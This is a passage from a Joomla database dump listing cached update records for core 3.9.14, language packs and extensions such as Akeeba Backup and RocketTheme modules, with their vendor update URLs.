AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(8856,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(8857,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(8858,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(8859,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(8860,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(8861,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(8862,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(8863,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(8864,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(8865,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(8866,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(8867,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(8868,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(8869,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(8870,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(8871,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(8872,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(8873,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(8874,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(8875,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(8876,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(8877,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(8878,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(8879,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.9','','http://cdn.akeebabackup.com/updates/fef.xml','\n			https://www.akeebabackup.com/download/fef/1-0-9.html			\n		',''),(8880,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(8881,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-1.html			\n		',''),(8882,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8883,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8884,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(8885,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(8886,3,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(8887,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(8888,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(8889,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(8890,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(8891,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(8892,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(8893,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(8894,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(8895,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(8896,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(8897,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(8898,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(8899,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(8900,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(8901,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(8902,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(8903,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(8904,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(8905,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(8906,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(8907,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(8908,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(8909,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(8910,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(8911,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(8912,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(8913,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(8914,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(8915,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(8916,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(8917,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(8918,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(8919,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(8920,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(8921,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(8922,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(8923,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(8924,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(8925,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(8926,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(8927,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(8928,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(8929,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(8930,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8931,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(8932,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(8933,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(8934,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(8935,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(8936,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(8937,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(8938,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(8939,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(8940,57,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(8941,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(8942,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(8943,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(8944,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(8945,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(8946,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(8947,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(8948,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(8949,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(8950,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(8951,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(8952,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(8953,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(8954,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(8955,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(8956,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(8957,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(8958,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(8959,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(8960,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(8961,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(8962,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(8963,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(8964,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(8965,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(8966,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(8967,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(8968,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(8969,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(8970,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(8971,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(8972,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(8973,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(8974,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(8975,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(8976,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(8977,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(8978,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(8979,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(8980,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(8981,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(8982,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(8983,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(8984,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8985,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.9','','http://cdn.akeebabackup.com/updates/fef.xml','\n			https://www.akeebabackup.com/download/fef/1-0-9.html			\n		',''),(8987,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(8988,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-1.html			\n		',''),(8989,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8990,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8991,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8992,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8993,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8994,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8995,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8996,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8997,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8998,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8999,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9000,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9001,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9002,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9003,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9004,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9005,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9006,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9007,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9008,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9009,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9010,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9011,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9012,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9013,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9014,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9015,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9016,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9017,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9018,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(9019,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(9020,3,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(9021,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(9022,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(9023,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(9024,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(9025,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(9026,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(9027,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(9028,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(9029,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(9030,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(9031,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(9032,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(9033,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(9034,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(9035,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(9036,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(9037,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(9038,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(9039,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(9040,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(9041,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(9042,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(9043,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(9044,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(9045,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(9046,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(9047,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(9048,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(9049,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(9050,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(9051,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(9052,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(9053,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(9054,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(9055,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(9056,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(9057,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(9058,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(9059,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(9060,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(9061,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(9062,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(9063,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(9064,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9065,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(9066,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(9067,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(9068,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(9069,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(9070,20,0,'RokCommon 